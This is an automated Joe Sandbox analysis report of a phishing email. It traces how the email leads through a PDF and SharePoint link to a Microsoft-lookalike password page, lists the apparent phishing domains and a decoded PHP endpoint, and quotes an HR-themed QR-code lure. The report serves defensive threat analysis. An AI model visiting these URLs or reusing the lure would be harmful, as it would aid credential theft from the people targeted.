Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[EXTERNAL] New file received.eml

Overview

General Information

Sample name:[EXTERNAL] New file received.eml
Analysis ID:1431653
MD5:f8f87d22bc61a86fa89dd6be095d26e3
SHA1:16d082f6ef105742033d079edc31e71d68487833
SHA256:d414e9175e4c39f3c732959392185c72879c31a016e6434719e122fb3c4829bc
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Phishing site detected (based on OCR NLP Model)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6976 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\[EXTERNAL] New file received.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1268 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F15E87A-F4F5-41A0-85F1-EE21D7E679CA" "661D7BC0-4B82-4AEA-8949-4FC7A612D31E" "6976" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 6648 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LJCJW6K6\doc.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5944 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2460 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1568,i,6322363310838676610,13576868675336177031,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • chrome.exe (PID: 7972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://netorgft3648903-my.sharepoint.com/:i:/g/personal/samantha_ever-eden_com/ETynNqAni0ZGvnNsfK8_gFUBLU0ujruoc4-tRd106qEydA?e=UCB3GP MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1864,i,4587492028271815079,3270805949953192956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pub-f2f0bb32ee854056bd3509f477f0b9bd.r2.dev/zzz.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1888,i,8296332157048774752,13400503550729438534,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
        Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LJCJW6K6\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: https://autopaysystems-processor.com/auth.htmlMatcher: Template: microsoft matched with high similarity
        Source: Yara matchFile source: 1.6.pages.csv, type: HTML
        Source: Yara matchFile source: 1.7.pages.csv, type: HTML
        Source: Yara matchFile source: 1.6.pages.csv, type: HTML
        Source: https://autopaysystems-processor.com/auth.htmlMatcher: Found strong image similarity, brand: MICROSOFT
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: Number of links: 0
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: Total embedded image size: 31111
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: Base64 decoded: https://lakesidelumbar.com/civ/fixfile/2f008b2.php
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: Invalid link: Forgot my password
        Source: Chrome DOM: 0.5ML Model on OCR Text: Matched 98.1% probability on "Download doc-HR.png Info 1/1 HUMAN RESOURCES SHARED A DOCUMENT WITH YOU Compensation Adjustment-Beneficiary package, Salary-Increase, Insurance Revision Scan QR with your Office eMaiI to access document 1 "
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: <input type="password" .../> found
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: No favicon
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: No <meta name="author".. found
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: No <meta name="author".. found
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: No <meta name="copyright".. found
        Source: https://autopaysystems-processor.com/auth.htmlHTTP Parser: No <meta name="copyright".. found
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49830 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.47.176.131
        Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.81
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.21.200
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: spo.nel.measure.office.net
        Source: global trafficDNS traffic detected: DNS query: eastus1-mediap.svc.ms
        Source: global trafficDNS traffic detected: DNS query: pub-f2f0bb32ee854056bd3509f477f0b9bd.r2.dev
        Source: global trafficDNS traffic detected: DNS query: autopaysystems-processor.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: lakesidelumbar.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
        Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
        Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49830 version: TLS 1.2
        Source: classification engineClassification label: mal60.phis.winEML@42/496@30/216
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240425T1515490548-6976.etl
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\[EXTERNAL] New file received.eml"
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F15E87A-F4F5-41A0-85F1-EE21D7E679CA" "661D7BC0-4B82-4AEA-8949-4FC7A612D31E" "6976" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LJCJW6K6\doc.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1568,i,6322363310838676610,13576868675336177031,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F15E87A-F4F5-41A0-85F1-EE21D7E679CA" "661D7BC0-4B82-4AEA-8949-4FC7A612D31E" "6976" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding D354AEC3DB260EEA945B4ED6DC00FCC7
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://netorgft3648903-my.sharepoint.com/:i:/g/personal/samantha_ever-eden_com/ETynNqAni0ZGvnNsfK8_gFUBLU0ujruoc4-tRd106qEydA?e=UCB3GP
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1864,i,4587492028271815079,3270805949953192956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LJCJW6K6\doc.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1568,i,6322363310838676610,13576868675336177031,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pub-f2f0bb32ee854056bd3509f477f0b9bd.r2.dev/zzz.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1888,i,8296332157048774752,13400503550729438534,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://netorgft3648903-my.sharepoint.com/:i:/g/personal/samantha_ever-eden_com/ETynNqAni0ZGvnNsfK8_gFUBLU0ujruoc4-tRd106qEydA?e=UCB3GP
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1864,i,4587492028271815079,3270805949953192956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1888,i,8296332157048774752,13400503550729438534,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
